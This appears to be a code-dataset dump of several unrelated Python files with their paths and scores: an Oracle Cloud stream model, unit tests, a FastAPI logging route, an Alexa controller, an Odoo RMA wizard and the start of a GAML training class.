'stream_pool_id': 'str',
'retention_in_hours': 'int',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))'
}
self.attribute_map = {
'name': 'name',
'partitions': 'partitions',
'compartment_id': 'compartmentId',
'stream_pool_id': 'streamPoolId',
'retention_in_hours': 'retentionInHours',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags'
}
self._name = None
self._partitions = None
self._compartment_id = None
self._stream_pool_id = None
self._retention_in_hours = None
self._freeform_tags = None
self._defined_tags = None
@property
def name(self):
"""
**[Required]** Gets the name of this CreateStreamDetails.
The name of the stream. Avoid entering confidential information.
Example: `TelemetryEvents`
:return: The name of this CreateStreamDetails.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this CreateStreamDetails.
The name of the stream. Avoid entering confidential information.
Example: `TelemetryEvents`
:param name: The name of this CreateStreamDetails.
:type: str
"""
self._name = name
@property
def partitions(self):
"""
**[Required]** Gets the partitions of this CreateStreamDetails.
The number of partitions in the stream.
:return: The partitions of this CreateStreamDetails.
:rtype: int
"""
return self._partitions
@partitions.setter
def partitions(self, partitions):
"""
Sets the partitions of this CreateStreamDetails.
The number of partitions in the stream.
:param partitions: The partitions of this CreateStreamDetails.
:type: int
"""
self._partitions = partitions
@property
def compartment_id(self):
"""
Gets the compartment_id of this CreateStreamDetails.
The OCID of the compartment that contains the stream.
:return: The compartment_id of this CreateStreamDetails.
:rtype: str
"""
return self._compartment_id
@compartment_id.setter
def compartment_id(self, compartment_id):
"""
Sets the compartment_id of this CreateStreamDetails.
The OCID of the compartment that contains the stream.
:param compartment_id: The compartment_id of this CreateStreamDetails.
:type: str
"""
self._compartment_id = compartment_id
@property
def stream_pool_id(self):
"""
Gets the stream_pool_id of this CreateStreamDetails.
The OCID of the stream pool that contains the stream.
:return: The stream_pool_id of this CreateStreamDetails.
:rtype: str
"""
return self._stream_pool_id
@stream_pool_id.setter
def stream_pool_id(self, stream_pool_id):
"""
Sets the stream_pool_id of this CreateStreamDetails.
The OCID of the stream pool that contains the stream.
:param stream_pool_id: The stream_pool_id of this CreateStreamDetails.
:type: str
"""
self._stream_pool_id = stream_pool_id
@property
def retention_in_hours(self):
"""
Gets the retention_in_hours of this CreateStreamDetails.
The retention period of the stream, in hours. Accepted values are between 24 and 168 (7 days).
If not specified, the stream will have a retention period of 24 hours.
:return: The retention_in_hours of this CreateStreamDetails.
:rtype: int
"""
return self._retention_in_hours
@retention_in_hours.setter
def retention_in_hours(self, retention_in_hours):
"""
Sets the retention_in_hours of this CreateStreamDetails.
The retention period of the stream, in hours. Accepted values are between 24 and 168 (7 days).
If not specified, the stream will have a retention period of 24 hours.
:param retention_in_hours: The retention_in_hours of this CreateStreamDetails.
:type: int
"""
self._retention_in_hours = retention_in_hours
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this CreateStreamDetails.
Free-form tags for this resource. Each tag is a simple key-value pair that is applied with no predefined name, type, or namespace. Exists for cross-compatibility only.
For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:return: The freeform_tags of this CreateStreamDetails.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this CreateStreamDetails.
Free-form tags for this resource. Each tag is a simple key-value pair that is applied with no predefined name, type, or namespace. Exists for cross-compatibility only.
For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:param freeform_tags: The freeform_tags of this CreateStreamDetails.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def defined_tags(self):
"""
Gets the defined_tags of this CreateStreamDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:return: The defined_tags of this CreateStreamDetails.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this CreateStreamDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:param defined_tags: The defined_tags of this CreateStreamDetails.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other | 0.838018 | 0.318167 |
from sparts.sparts import option
from sparts.vtask import ExecuteContext, VTask
from sparts.tests.base import BaseSpartsTestCase, SingleTaskTestCase
class ExecuteContextTests(BaseSpartsTestCase):
def test_comparisons(self):
self.assertEqual(ExecuteContext(), ExecuteContext())
self.assertEqual(ExecuteContext(item=10), ExecuteContext(item=10))
self.assertNotEqual(ExecuteContext(), ExecuteContext(item=4))
self.assertNotEqual(ExecuteContext(item=3), ExecuteContext(item=4))
self.assertLess(ExecuteContext(item=0), ExecuteContext(item=10))
self.assertGreater(ExecuteContext(item=10), ExecuteContext(item=0))
class VTaskOptionTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(default="ham")
def test_options(self):
self.assertEqual(self.task.basicopt, "spam")
self.assertEqual(self.task.opt_uscore, "eggs")
self.assertEqual(self.task.opt_uscore2, "ham")
class VTaskOptionOverrideTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(name="opt_uscore2", default="ham")
def getCreateArgs(self):
return [
'--TASK-basicopt', 'foo',
'--TASK-opt-uscore', 'bar',
'--TASK-opt-uscore2', 'baz',
]
def test_options(self):
self.assertEqual(self.task.basicopt, "foo")
self.assertEqual(self.task.opt_uscore, "bar")
self.assertEqual(self.task.opt_uscore2, "baz")
class VTaskOptionPrefixTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
OPT_PREFIX = 'my_task'
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(name="opt_uscore2", default="ham")
def test_options(self):
self.assertEqual(self.task.basicopt, "spam")
self.assertEqual(self.task.opt_uscore, "eggs")
self.assertEqual(self.task.opt_uscore2, "ham")
class VTaskOptionPrefixOverrideTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
OPT_PREFIX = 'my_task'
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(name="opt_uscore2", default="ham")
def getCreateArgs(self):
return [
'--my-task-basicopt', 'foo',
'--my-task-opt-uscore', 'bar',
'--my-task-opt-uscore2', 'baz',
]
def test_options(self):
self.assertEqual(self.task.basicopt, "foo")
self.assertEqual(self.task.opt_uscore, "bar")
self.assertEqual(self.task.opt_uscore2, "baz") | tests/test_vtask.py | from sparts.sparts import option
from sparts.vtask import ExecuteContext, VTask
from sparts.tests.base import BaseSpartsTestCase, SingleTaskTestCase
class ExecuteContextTests(BaseSpartsTestCase):
def test_comparisons(self):
self.assertEqual(ExecuteContext(), ExecuteContext())
self.assertEqual(ExecuteContext(item=10), ExecuteContext(item=10))
self.assertNotEqual(ExecuteContext(), ExecuteContext(item=4))
self.assertNotEqual(ExecuteContext(item=3), ExecuteContext(item=4))
self.assertLess(ExecuteContext(item=0), ExecuteContext(item=10))
self.assertGreater(ExecuteContext(item=10), ExecuteContext(item=0))
class VTaskOptionTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(default="ham")
def test_options(self):
self.assertEqual(self.task.basicopt, "spam")
self.assertEqual(self.task.opt_uscore, "eggs")
self.assertEqual(self.task.opt_uscore2, "ham")
class VTaskOptionOverrideTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(name="opt_uscore2", default="ham")
def getCreateArgs(self):
return [
'--TASK-basicopt', 'foo',
'--TASK-opt-uscore', 'bar',
'--TASK-opt-uscore2', 'baz',
]
def test_options(self):
self.assertEqual(self.task.basicopt, "foo")
self.assertEqual(self.task.opt_uscore, "bar")
self.assertEqual(self.task.opt_uscore2, "baz")
class VTaskOptionPrefixTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
OPT_PREFIX = 'my_task'
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(name="opt_uscore2", default="ham")
def test_options(self):
self.assertEqual(self.task.basicopt, "spam")
self.assertEqual(self.task.opt_uscore, "eggs")
self.assertEqual(self.task.opt_uscore2, "ham")
class VTaskOptionPrefixOverrideTests(SingleTaskTestCase):
class TASK(VTask):
LOOPLESS = True
OPT_PREFIX = 'my_task'
basicopt = option(default="spam")
opt_uscore = option(default="eggs")
opt_uscore2 = option(name="opt_uscore2", default="ham")
def getCreateArgs(self):
return [
'--my-task-basicopt', 'foo',
'--my-task-opt-uscore', 'bar',
'--my-task-opt-uscore2', 'baz',
]
def test_options(self):
self.assertEqual(self.task.basicopt, "foo")
self.assertEqual(self.task.opt_uscore, "bar")
self.assertEqual(self.task.opt_uscore2, "baz") | 0.630002 | 0.213787 |
import json
from datetime import datetime
from typing import Callable, Optional
import logging
from fastapi import Request, Response
from fastapi.routing import APIRoute
def reformat_body(body: bin, obfuscate: bool = False):
"""
Decodes the binary body into something more useful for logging.
- body - the binary body object from the request or response
- obfuscate (default=False) - will obfuscate all the values in the key-value pairs in the body data.
"""
if body:
try:
# Try to parse as a JSON object and return as a Dict (obfuscated if required)
data = json.loads(body.decode())
if obfuscate:
data = {k: "***" for k, v in data.items()}
return data
except:
# Obfuscate if a body exits and is not JSON
if obfuscate:
return "***"
else:
return body.decode()
else:
return None
class BaseContextRoute(APIRoute):
"""
A router that will log request and response information.
Note that it will only log successful requests.
Inspiration taken from Yagiz's solution
- https://stackoverflow.com/questions/64115628/get-starlette-request-body-in-the-middleware-context
Usage example:
router = APIRouter(route_class=LogContextRout)
@router.post("/endpoint")
async def my_endpoint(body: List[str] = Body(...)):
...
To adjust parameterisation, subclass this and change the parameters.
"""
obfuscate_request_body = False
obfuscate_response_body = False
def get_route_handler(self) -> Callable:
original_route_handler = super().get_route_handler()
async def custom_route_handler(request: Request) -> Response:
start = datetime.utcnow()
response: Response = await original_route_handler(request)
# Decode the request and response body so we can push to the logging
request_content = reformat_body(
await request.body(), obfuscate=self.obfuscate_request_body
)
response_content = reformat_body(
response.body, obfuscate=self.obfuscate_response_body
)
log_data = {
"utc": str(start),
"duration": (datetime.utcnow() - start).total_seconds(),
"ip": request.client.host,
"request": {
"method": request.method,
"hostname": request.url.hostname,
"path": request.url.path,
"querystring": request.url.query,
"body": request_content,
},
"response": {
"status": response.status_code,
"body": response_content,
},
}
self.push_log(log_data)
return response
return custom_route_handler
def push_log(self, log_data: dict):
"""
Method to push the log to wherever you wish.
This by default prints to the console.
Overwrite this method to push the log to where you wish it to go.
"""
print(log_data)
class LogContextRoute(BaseContextRoute):
"""This ContextRoute class pushes the log data to a logger."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._logger = logging.getLogger(__name__)
self._logger.addHandler(logging.NullHandler())
def push_log(self, log_data: dict):
self._logger.info(log_data)
class ObfuscatedRequestContextRoute(BaseContextRoute):
"""This ContextRoute obfuscates the request object only."""
obfuscate_request_body = True | starlette_logging_request_body/router.py | import json
from datetime import datetime
from typing import Callable, Optional
import logging
from fastapi import Request, Response
from fastapi.routing import APIRoute
def reformat_body(body: bin, obfuscate: bool = False):
"""
Decodes the binary body into something more useful for logging.
- body - the binary body object from the request or response
- obfuscate (default=False) - will obfuscate all the values in the key-value pairs in the body data.
"""
if body:
try:
# Try to parse as a JSON object and return as a Dict (obfuscated if required)
data = json.loads(body.decode())
if obfuscate:
data = {k: "***" for k, v in data.items()}
return data
except:
# Obfuscate if a body exits and is not JSON
if obfuscate:
return "***"
else:
return body.decode()
else:
return None
class BaseContextRoute(APIRoute):
"""
A router that will log request and response information.
Note that it will only log successful requests.
Inspiration taken from Yagiz's solution
- https://stackoverflow.com/questions/64115628/get-starlette-request-body-in-the-middleware-context
Usage example:
router = APIRouter(route_class=LogContextRout)
@router.post("/endpoint")
async def my_endpoint(body: List[str] = Body(...)):
...
To adjust parameterisation, subclass this and change the parameters.
"""
obfuscate_request_body = False
obfuscate_response_body = False
def get_route_handler(self) -> Callable:
original_route_handler = super().get_route_handler()
async def custom_route_handler(request: Request) -> Response:
start = datetime.utcnow()
response: Response = await original_route_handler(request)
# Decode the request and response body so we can push to the logging
request_content = reformat_body(
await request.body(), obfuscate=self.obfuscate_request_body
)
response_content = reformat_body(
response.body, obfuscate=self.obfuscate_response_body
)
log_data = {
"utc": str(start),
"duration": (datetime.utcnow() - start).total_seconds(),
"ip": request.client.host,
"request": {
"method": request.method,
"hostname": request.url.hostname,
"path": request.url.path,
"querystring": request.url.query,
"body": request_content,
},
"response": {
"status": response.status_code,
"body": response_content,
},
}
self.push_log(log_data)
return response
return custom_route_handler
def push_log(self, log_data: dict):
"""
Method to push the log to wherever you wish.
This by default prints to the console.
Overwrite this method to push the log to where you wish it to go.
"""
print(log_data)
class LogContextRoute(BaseContextRoute):
"""This ContextRoute class pushes the log data to a logger."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._logger = logging.getLogger(__name__)
self._logger.addHandler(logging.NullHandler())
def push_log(self, log_data: dict):
self._logger.info(log_data)
class ObfuscatedRequestContextRoute(BaseContextRoute):
"""This ContextRoute obfuscates the request object only."""
obfuscate_request_body = True | 0.759315 | 0.211417 |
from unittest import TestCase
from scoville.signal import GenericSignal, DelayedSignal
INPUT_RESISTANCE = 10
LOW = 0.0
HIGH = 5.0
MAX_CURRENT = 0.01
MAX_LOW_VOLTAGE = 0.5
MIN_HIGH_VOLTAGE = 4.5
class AndUnitTests(TestCase):
def testLowLowShouldResultInLow(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", LOW))
circuit.setSignal(GenericSignal("B", LOW))
circuit.inspectVoltage('AND')
circuit.run()
self.assertLess(circuit.getVoltage('AND'), MAX_LOW_VOLTAGE)
def testLowHighShouldResultInLow(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", LOW))
circuit.setSignal(GenericSignal("B", HIGH))
circuit.inspectVoltage('AND')
circuit.run()
self.assertLess(circuit.getVoltage('AND'), MAX_LOW_VOLTAGE)
def testHighLowShouldResultInLow(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(GenericSignal("B", LOW))
circuit.inspectVoltage('AND')
circuit.run()
self.assertLess(circuit.getVoltage('AND'), MAX_LOW_VOLTAGE)
def testHighHighShouldResultInHigh(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(GenericSignal("B", HIGH))
circuit.inspectVoltage('AND')
circuit.run()
self.assertGreater(circuit.getVoltage('AND'), MIN_HIGH_VOLTAGE)
def testShouldNotUseTooMuchCurrent(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(GenericSignal("B", HIGH))
circuit.inspectCurrent('VP5V')
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
circuit.setSignal(GenericSignal("A", LOW))
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
circuit.setSignal(GenericSignal("B", LOW))
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
circuit.setSignal(GenericSignal("A", HIGH))
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
def testShouldSwitchOnIn1ns(self):
circuit = self.getCircuit()
changeTime = 10
endTime = 20
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(DelayedSignal("B", HIGH, delay=changeTime, startValue=LOW, resistance=INPUT_RESISTANCE))
circuit.inspectVoltage('AND')
circuit.run(endTime, 0.001)
self.assertLess(circuit.getMaxVoltage('AND', start=1, end=changeTime), MAX_LOW_VOLTAGE)
self.assertGreater(circuit.getMinVoltage('AND', start=changeTime + 1, end=endTime), MIN_HIGH_VOLTAGE)
def testShouldSwitchOffIn1ns(self):
circuit = self.getCircuit()
changeTime = 10
endTime = 20
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(DelayedSignal("B", value=LOW, delay=changeTime, resistance=INPUT_RESISTANCE, startValue=HIGH))
circuit.inspectVoltage('AND')
circuit.run(endTime, 0.001)
self.assertGreater(circuit.getMinVoltage('AND', start=1, end=changeTime), MIN_HIGH_VOLTAGE)
self.assertLess(circuit.getMaxVoltage('AND', start=changeTime + 1, end=endTime), MAX_LOW_VOLTAGE) | test/unitTests/test_AND.py | from unittest import TestCase
from scoville.signal import GenericSignal, DelayedSignal
INPUT_RESISTANCE = 10
LOW = 0.0
HIGH = 5.0
MAX_CURRENT = 0.01
MAX_LOW_VOLTAGE = 0.5
MIN_HIGH_VOLTAGE = 4.5
class AndUnitTests(TestCase):
def testLowLowShouldResultInLow(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", LOW))
circuit.setSignal(GenericSignal("B", LOW))
circuit.inspectVoltage('AND')
circuit.run()
self.assertLess(circuit.getVoltage('AND'), MAX_LOW_VOLTAGE)
def testLowHighShouldResultInLow(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", LOW))
circuit.setSignal(GenericSignal("B", HIGH))
circuit.inspectVoltage('AND')
circuit.run()
self.assertLess(circuit.getVoltage('AND'), MAX_LOW_VOLTAGE)
def testHighLowShouldResultInLow(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(GenericSignal("B", LOW))
circuit.inspectVoltage('AND')
circuit.run()
self.assertLess(circuit.getVoltage('AND'), MAX_LOW_VOLTAGE)
def testHighHighShouldResultInHigh(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(GenericSignal("B", HIGH))
circuit.inspectVoltage('AND')
circuit.run()
self.assertGreater(circuit.getVoltage('AND'), MIN_HIGH_VOLTAGE)
def testShouldNotUseTooMuchCurrent(self):
circuit = self.getCircuit()
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(GenericSignal("B", HIGH))
circuit.inspectCurrent('VP5V')
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
circuit.setSignal(GenericSignal("A", LOW))
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
circuit.setSignal(GenericSignal("B", LOW))
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
circuit.setSignal(GenericSignal("A", HIGH))
circuit.run()
self.assertLess(circuit.getMaxCurrent('VP5V'), MAX_CURRENT)
def testShouldSwitchOnIn1ns(self):
circuit = self.getCircuit()
changeTime = 10
endTime = 20
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(DelayedSignal("B", HIGH, delay=changeTime, startValue=LOW, resistance=INPUT_RESISTANCE))
circuit.inspectVoltage('AND')
circuit.run(endTime, 0.001)
self.assertLess(circuit.getMaxVoltage('AND', start=1, end=changeTime), MAX_LOW_VOLTAGE)
self.assertGreater(circuit.getMinVoltage('AND', start=changeTime + 1, end=endTime), MIN_HIGH_VOLTAGE)
def testShouldSwitchOffIn1ns(self):
circuit = self.getCircuit()
changeTime = 10
endTime = 20
circuit.setSignal(GenericSignal("A", HIGH))
circuit.setSignal(DelayedSignal("B", value=LOW, delay=changeTime, resistance=INPUT_RESISTANCE, startValue=HIGH))
circuit.inspectVoltage('AND')
circuit.run(endTime, 0.001)
self.assertGreater(circuit.getMinVoltage('AND', start=1, end=changeTime), MIN_HIGH_VOLTAGE)
self.assertLess(circuit.getMaxVoltage('AND', start=changeTime + 1, end=endTime), MAX_LOW_VOLTAGE) | 0.760028 | 0.621254 |
import logging
from smart_home.mqtt_client import MQTTClient
from smart_home.utils_lambda import get_utc_timestamp, error_response, success_response, get_payload, get_request_message_id, get_mqtt_topics_from_request,\
get_friendly_name_from_request
class PercentageController(object):
@staticmethod
def handle_request(request):
logger = logging.getLogger()
logger.info("PercentageController: Changing the percentage of '%s' ",
get_friendly_name_from_request(request))
percentage = get_payload(request).get("percentage")
percentage_delta = get_payload(request).get("percentageDelta")
if percentage:
key = "percentage"
value = int(percentage)
elif percentage_delta:
key = "percentageDelta"
value = int(percentage_delta)
mqtt_topic_set, mqtt_topic_get = get_mqtt_topics_from_request(request)
message_id = get_request_message_id(request)
resp_payload = MQTTClient.publish_wait_for_resp(
mqtt_topic_set, {"messageId": message_id, "status": {key: value}}, message_id, mqtt_topic_get)
if resp_payload is None:
return error_response(request)
percentage = None
status = resp_payload.get("status")
if status:
percentage = status.get("percentage")
if percentage is not None:
return PercentageController.__response_success(request, percentage)
return error_response(request)
@staticmethod
def __response_success(request, percentage):
payload = {
"context": {
"properties": [
{
"namespace": "Alexa.PercentageController",
"name": "percentage",
"value": int(percentage),
"timeOfSample": get_utc_timestamp(),
"uncertaintyInMilliseconds": 0
}
]
}
}
return success_response(request, payload) | smart_home/percentage_controller.py | import logging
from smart_home.mqtt_client import MQTTClient
from smart_home.utils_lambda import get_utc_timestamp, error_response, success_response, get_payload, get_request_message_id, get_mqtt_topics_from_request,\
get_friendly_name_from_request
class PercentageController(object):
@staticmethod
def handle_request(request):
logger = logging.getLogger()
logger.info("PercentageController: Changing the percentage of '%s' ",
get_friendly_name_from_request(request))
percentage = get_payload(request).get("percentage")
percentage_delta = get_payload(request).get("percentageDelta")
if percentage:
key = "percentage"
value = int(percentage)
elif percentage_delta:
key = "percentageDelta"
value = int(percentage_delta)
mqtt_topic_set, mqtt_topic_get = get_mqtt_topics_from_request(request)
message_id = get_request_message_id(request)
resp_payload = MQTTClient.publish_wait_for_resp(
mqtt_topic_set, {"messageId": message_id, "status": {key: value}}, message_id, mqtt_topic_get)
if resp_payload is None:
return error_response(request)
percentage = None
status = resp_payload.get("status")
if status:
percentage = status.get("percentage")
if percentage is not None:
return PercentageController.__response_success(request, percentage)
return error_response(request)
@staticmethod
def __response_success(request, percentage):
payload = {
"context": {
"properties": [
{
"namespace": "Alexa.PercentageController",
"name": "percentage",
"value": int(percentage),
"timeOfSample": get_utc_timestamp(),
"uncertaintyInMilliseconds": 0
}
]
}
}
return success_response(request, payload) | 0.610802 | 0.122078 |
from odoo import _, api, fields, models
from odoo.exceptions import ValidationError
class ReturnPicking(models.TransientModel):
_inherit = 'stock.return.picking'
create_rma = fields.Boolean(
string="Create RMAs"
)
picking_type_code = fields.Selection(
selection=[
('incoming', 'Vendors'),
('outgoing', 'Customers'),
('internal', 'Internal'),
],
related='picking_id.picking_type_id.code',
store=True,
readonly=True,
)
@api.onchange("create_rma")
def _onchange_create_rma(self):
if self.create_rma:
warehouse = self.picking_id.picking_type_id.warehouse_id
self.location_id = warehouse.rma_loc_id.id
rma_loc = warehouse.search([]).mapped('rma_loc_id')
rma_loc_domain = [('id', 'child_of', rma_loc.ids)]
else:
self.location_id = self.default_get(['location_id'])['location_id']
rma_loc_domain = [
'|',
('id', '=', self.picking_id.location_id.id),
('return_location', '=', True),
]
return {'domain': {'location_id': rma_loc_domain}}
def create_returns(self):
""" Override create_returns method for creating one or more
'confirmed' RMAs after return a delivery picking in case
'Create RMAs' checkbox is checked in this wizard.
New RMAs will be linked to the delivery picking as the origin
delivery and also RMAs will be linked to the returned picking
as the 'Receipt'.
"""
if self.create_rma:
# set_rma_picking_type is to override the copy() method of stock
# picking and change the default picking type to rma picking type
self_with_context = self.with_context(set_rma_picking_type=True)
res = super(ReturnPicking, self_with_context).create_returns()
partner = self.picking_id.partner_id
if not partner:
raise ValidationError(_(
"You must specify the 'Customer' in the "
"'Stock Picking' from which RMAs will be created"))
picking = self.picking_id
returned_picking = self.env['stock.picking'].browse(res['res_id'])
if hasattr(picking, 'sale_id') and picking.sale_id:
partner_invoice_id = picking.sale_id.partner_invoice_id.id
else:
partner_invoice_id = partner.address_get(
['invoice']).get('invoice', False),
for move in returned_picking.move_lines:
self.env['rma'].create({
'partner_id': partner.id,
'partner_invoice_id': partner_invoice_id,
'origin': picking.name,
'picking_id': picking.id,
'move_id': move.origin_returned_move_id.id,
'product_id': move.origin_returned_move_id.product_id.id,
'product_uom_qty': move.product_uom_qty,
'product_uom': move.product_uom.id,
'reception_move_id': move.id,
'company_id': move.company_id.id,
'location_id': move.location_dest_id.id,
'state': 'confirmed',
})
return res
else:
return super().create_returns() | rma/setup/rma/odoo/addons/rma/wizard/stock_picking_return.py |
from odoo import _, api, fields, models
from odoo.exceptions import ValidationError
class ReturnPicking(models.TransientModel):
_inherit = 'stock.return.picking'
create_rma = fields.Boolean(
string="Create RMAs"
)
picking_type_code = fields.Selection(
selection=[
('incoming', 'Vendors'),
('outgoing', 'Customers'),
('internal', 'Internal'),
],
related='picking_id.picking_type_id.code',
store=True,
readonly=True,
)
@api.onchange("create_rma")
def _onchange_create_rma(self):
if self.create_rma:
warehouse = self.picking_id.picking_type_id.warehouse_id
self.location_id = warehouse.rma_loc_id.id
rma_loc = warehouse.search([]).mapped('rma_loc_id')
rma_loc_domain = [('id', 'child_of', rma_loc.ids)]
else:
self.location_id = self.default_get(['location_id'])['location_id']
rma_loc_domain = [
'|',
('id', '=', self.picking_id.location_id.id),
('return_location', '=', True),
]
return {'domain': {'location_id': rma_loc_domain}}
def create_returns(self):
""" Override create_returns method for creating one or more
'confirmed' RMAs after return a delivery picking in case
'Create RMAs' checkbox is checked in this wizard.
New RMAs will be linked to the delivery picking as the origin
delivery and also RMAs will be linked to the returned picking
as the 'Receipt'.
"""
if self.create_rma:
# set_rma_picking_type is to override the copy() method of stock
# picking and change the default picking type to rma picking type
self_with_context = self.with_context(set_rma_picking_type=True)
res = super(ReturnPicking, self_with_context).create_returns()
partner = self.picking_id.partner_id
if not partner:
raise ValidationError(_(
"You must specify the 'Customer' in the "
"'Stock Picking' from which RMAs will be created"))
picking = self.picking_id
returned_picking = self.env['stock.picking'].browse(res['res_id'])
if hasattr(picking, 'sale_id') and picking.sale_id:
partner_invoice_id = picking.sale_id.partner_invoice_id.id
else:
partner_invoice_id = partner.address_get(
['invoice']).get('invoice', False),
for move in returned_picking.move_lines:
self.env['rma'].create({
'partner_id': partner.id,
'partner_invoice_id': partner_invoice_id,
'origin': picking.name,
'picking_id': picking.id,
'move_id': move.origin_returned_move_id.id,
'product_id': move.origin_returned_move_id.product_id.id,
'product_uom_qty': move.product_uom_qty,
'product_uom': move.product_uom.id,
'reception_move_id': move.id,
'company_id': move.company_id.id,
'location_id': move.location_dest_id.id,
'state': 'confirmed',
})
return res
else:
return super().create_returns() | 0.539954 | 0.132739 |
from GAML.functions import file_size_check, file_gen_new
from GAML.file_gen_gromacstop import File_gen_gromacstop
from GAML.charge_gen_scheme import Charge_gen_scheme
import os
import shutil
from pkg_resources import resource_string
class GAML_autotrain(object):
def __init__(self,*args,**kwargs):
if 'file_path' not in kwargs or kwargs['file_path'] is None:
raise ValueError('no inputs, file_path is missing')
self.file = kwargs['file_path'].strip()
file_size_check(self.file,fsize=2)
if 'fname' in kwargs and kwargs['fname'] is not None:
self.fname = kwargs['fname'].strip()
if len(self.fname) == 0: self.fname = 'bash_GAML_AutoTraining'
else:
self.fname = 'bash_GAML_AutoTraining'
self.parameters = {
'top_gas_path' : None,
'top_liq_path' : None,
'top_fep_path' : None,
'gro_gas_path' : None,
'gro_liq_path' : None,
'gro_fep_path' : None,
'grompp_min_gas_path' : None,
'grompp_min_liq_path' : None,
'grompp_nvt_liq_path' : None,
'grompp_npt_liq_path' : None,
'grompp_prod_gas_path' : None,
'grompp_prod_liq_path' : None,
'grompp_fep_min_steep_path' : None,
'grompp_fep_min_lbfgs_path' : None,
'grompp_fep_nvt_path' : None,
'grompp_fep_npt_path' : None,
'grompp_fep_prod_path' : None,
'charge_range_path' : None,
'gromacs_energy_kw' : 'Density',
'literature_value' : 1000,
'gmx' : 'gmx',
'MAE' : 0.05,
'training_total_nm' : 5,
'training_cnt' : 1,
'gennm' : 10,
'error_tolerance' : 0.5,
'symmetry_list' : None,
'pn_limit' : None,
'counter_list' : None,
'offset_list' : None,
'offset_nm' : None,
'ratio' : None,
'nmround' : None,
'total_charge' : 0.0,
'charge_extend_by' : None,
'threshold' : None,
'bool_neutral' : None,
'bool_nozero' : None,
'bool_abscomp' : None,
'reschoose' : None,
'analysis_begintime' : None,
'analysis_endtime' : None,
}
# check for the bash scripts
bo = True
if 'bashinterfile' in kwargs and kwargs['bashinterfile'] is not None:
self.bashinterfile = kwargs['bashinterfile'].strip()
if len(self.bashinterfile) == 0:
self.bashinterfile = 'GAML-BASH-Interface.sh'
else:
bo = False
else:
self.bashinterfile = 'GAML-BASH-Interface.sh'
if bo:
self.shfile = resource_string(__name__,'scripts/'+self.bashinterfile).decode('utf-8').replace('\r','')
else:
file_size_check(self.bashinterfile,fsize=10)
with open(self.bashinterfile,mode='rt') as f: self.shfile = f.read()
self.profile()
self.proparameters()
self.trial()
def run(self):
"""method place holder"""
pass
def profile(self):
"""Process input auto-settingfile"""
errinfo = 'Error: wrong defined settingfile\n'
parlist = [k for k in self.parameters]
with open(self.file,mode='rt') as f:
while True:
line = f.readline()
if len(line) == 0:
break
